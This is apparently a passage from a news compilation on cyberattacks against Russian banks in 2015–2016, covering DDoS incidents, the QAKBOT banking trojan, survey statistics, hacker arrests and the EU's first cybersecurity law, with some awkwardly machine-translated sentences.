Hackers attacked the largest Russian banks

Sberbank's information security specialists were able to detect and localize the attack quickly. No disruptions to client services were observed.

The bank's protection systems worked reliably; the attack was promptly detected and localized by Sberbank's cyber defense units, Russia's largest credit institution assured.

Besides Sberbank, several other large Russian banks endured powerful DDoS attacks, Kaspersky Lab told RIA Novosti. According to the agency, the attacks targeted five of the top-10 banks. Alfa-Bank confirmed the fact of the attack.

The bank told RIA Novosti that the attack was "fairly short and weak". The incident did not affect the bank's business systems in any way, representatives of the credit institution assured.

The average duration of each DDoS attack on Russian banks was about an hour; the longest lasted nearly 12 hours. Some banks, according to Kaspersky Lab, were attacked repeatedly, in series of two to four attacks with a short interval. Which other credit institutions were attacked was not specified.[26]

Trend Micro: Trojans are the main threat to the financial industry

On September 22, 2016 Trend Micro Incorporated published its information security report for the first half of 2016, "The Reign of Ransomware", according to which banking Trojans remain one of the most significant threats to the financial industry.

The reporting period saw an increase in the activity of the QAKBOT Trojan, a multi-component threat that targets banking data, information on the user's routine actions and other confidential information. The main difficulty in fighting Trojans of the QAKBOT kind is their continuous evolution and the emergence of new modifications.

Trojan attacks hit banks and their corporate clients whose employees execute banking transactions from devices operating in the corporate network. The stolen banking information is used by attackers to perform fraudulent transactions or is sold on underground sites for profit. Financial institutions bear the cost of compensating the losses suffered by their clients as a result of such attacks.

The technology capable of protecting the user's system should be multi-layered, the company's researcher noted in the report. The system should block threats from the Internet, from malicious files and from e-mail. Beyond endpoint protection, banks should use two-factor authentication on their websites and encourage clients to be extremely careful when opening e-mail messages, visiting websites and downloading files.

24% of Russian banks are subjected to DDoS attacks

In June 2016 Qrator Labs and Wallarm (Onsec) published the results of a study of the information security situation in the financial sector. The survey showed that nearly a quarter of Russian banks face DDoS attacks.

For the report, 150 representatives (heads of IT departments, their deputies and heads of departments responsible for information security) of more than 130 banks and 12 payment systems were surveyed.

According to the study, 24% of Russian banks experienced DDoS attacks in 2015. Another 21% and 17% of organizations faced phishing and hacking respectively. 34% of respondents had no information security problems.

Attempts to hack applications were recorded by 17% of respondents, so companies are paying increasing attention to perimeter protection. More than 80% of companies regularly conduct security audits.

Experts note that despite the difficult economic situation, banks try to keep cybersecurity spending high. About a third of respondents increased their cybersecurity budget in 2015 and another 44% kept it at the previous level.

Most survey participants (69%) consider the most effective means of countering DDoS to be the telecom operator's protection service. However, experts from Qrator and Wallarm warn that this approach is outdated. Only 9% of respondents consider cloud solutions effective.

The study also showed that the industry understands the main risks and consequences of cybersecurity incidents: 61% of respondents say security problems can lead to revocation of the banking license.

Information security is an important priority for organizations in the financial sector. The seriousness of cyber threats is adequately recognized, which indicates a certain maturity in cybersecurity matters, the researchers reported.

A group of 50 hackers detained for stealing 1.7 billion rubles

In June 2016 the media, citing law enforcement agencies, reported[27] that hackers had stolen more than 1.7 billion rubles from the accounts of Russian banks using malware. 50 cybercriminals operating across the country were detained. More than 80 searches were carried out in 15 regions as part of the operation.

The Ministry of Internal Affairs of the Russian Federation, together with the FSB of Russia, detained 50 people suspected of numerous thefts of money from the settlement accounts of legal entities and from correspondent accounts of financial institutions using malicious software, the official representative of the Ministry, Irina Volk, reported.

She added that as a result of the operation, fake payment orders worth 2.2 billion rubles were blocked. The FSB's Public Relations Center told Interfax that computer equipment, communication devices, bank cards issued to front men, financial documents and large sums of cash were seized during the searches.

A criminal case was opened under the articles "Organization of a criminal community and participation in it" and "Fraud in the field of computer information".


Banks in the EU obliged to share information on cyber attacks

On December 8, 2015 it became known that European officials had backed the EU's first law on cybersecurity regulation. It obliges companies to share data on attacks on their services; those that refuse may face sanctions, Reuters reports.

Representatives of the European Commission, the European Parliament and EU member states agreed on the cybersecurity bill after a five-hour discussion. One of its requirements is that companies must disclose to the authorities information about incidents involving hacker attacks on their computer systems, or face large fines.

Europe agreed to adopt its first cyber law

It covers organizations and enterprises in sectors critical to people, including transport, energy, the financial sector and health care. The requirements also apply to Internet companies such as Google, Amazon and eBay, but not to social networks.

Besides the need to report cyber attacks, European businesses will be required to ensure a high level of protection of their infrastructure.

According to Andrus Ansip, Vice President of the European Commission for the Digital Single Market, the new directive aims to increase consumer confidence in online services, especially cross-border ones.

"The Internet knows no borders: a problem in one country can easily spread to the rest of Europe. That is why the EU needs Europe-wide solutions in cybersecurity. The agreement reached is an important step in this direction," Ansip said.

He also noted that this is the first ever law regulating cybersecurity across the whole of Europe. When the new requirements will take effect was not specified.[28]

Positive Technologies: top trends of cyber attacks in banks in 2015

On October 15, 2015 representatives of Positive Technologies company made a speech at the "Trends of Development of Crimes in the field of High Technologies — 2015" conference.

Among top trends in banking sector experts noted growth of cases of fraud on non-cash transactions (purchases in online stores, etc.) and attacks on processing with we cash the stolen means via ATMs (losses in each of the cases which became known vary from 3 million to 14 million dollars). Also the number of the physical attacks on ATMs grew: from traditional tricks like "the Lebanese loop" to the GreenDispenser viruses allowing hackers to take banknotes from cartridges of ATMs.

According to experts of Positive Technologies, the universal volume of losses in 2014 only on frauds with plastic cards was about 16 billion dollars. At the end of 2015 it is expected that this digit will increase by 25% and will approach 20 billion. It is caused by growth of volume of banking activities, but not good training of criminals. At the same time for the last 20 years of observations the share of cases of fraud in the total amount of transactions practically did not change: swindlers earn about 6 cents from each 100 dollars passing through banks, and this digit changes all on plus or minus a half-cent with preserving of mean value from year to year.

Since 2006, when the international EMV chip standard for bank card transactions was introduced, losses from skimming (theft of card data by means of a special reader device, the skimmer) have been steadily declining. Although the level of losses is still high, experts expect a considerable decrease by the end of next year. This is because in October 2015 the USA, which accounts for about two thirds of global losses, joined the global practice.

2011: Attacks of the Carberp trojan

Main article: Carberp (trojan)

See Also

Read Also

  1. Russian hackers switched from Russian banks to foreign ones
  2. A "two" for cyber literacy: fraudsters mastered a new method of stealing data from banks
  3. APT attacks on the credit and financial sphere in Russia: an overview of tactics and techniques
  4. Fraudsters took over phones
  5. German banks dropped support for authorization by one-time SMS code
  6. 97% of large banks are vulnerable to cyber attacks
  7. Employees of large banks were prohibited from photographing computer screens
  8. Police in Chuvashia solved thefts of money from bank accounts committed using malware
  9. Russians were given long sentences for theft of money from Internet banks
  11. The State Duma adopted a bill on countering theft from bank accounts
  12. Six main facts about financial fraud in Russia
  13. Survey conducted by the analytical agency TAdviser among the 50 largest banks and insurance companies of Russia and the CIS. The experts were heads of IT departments, their deputies, and heads of cyber security services. The agency used a telephone interview format. The research was conducted in July and August 2017.
  14. VMware research conducted in June 2017 among 166 respondents from banks with assets of at least 15 billion US dollars: How Technology Will Shape the Bank of the Future
  15. The Supreme Court of the Russian Federation explained the subtleties of qualifying cyber fraud
  16. Kaspersky Lab warned of a new attack on Russian banks
  17. In Russia criminals learned to steal money from credit cards using Pokemon Go
  18. Cyber fraudsters created a new method of stealing money from cards
  19. Banking trojans will increase the number of attacks on Android
  20. Russia in 2016 became the leader in the number of mobile banking trojans
  21. Warned banks about the growing threat of cyber attacks
  22. Financial Stability Review
  23. Foreign intelligence agencies are preparing cyber attacks aimed at destabilizing Russia's financial system
  24. The Central Bank is informed of the cyber attacks being prepared against banks and is working with intelligence agencies to suppress them
  25. BlazingFast will check clients for participation in the preparation of cyber attacks on the Russian Federation
  26. Sberbank repelled a powerful DDoS attack
  27. A group of 50 hackers was detained for the theft of 1.7 billion rubles
  28. EU lawmakers, countries agree on bloc's first cyber-security law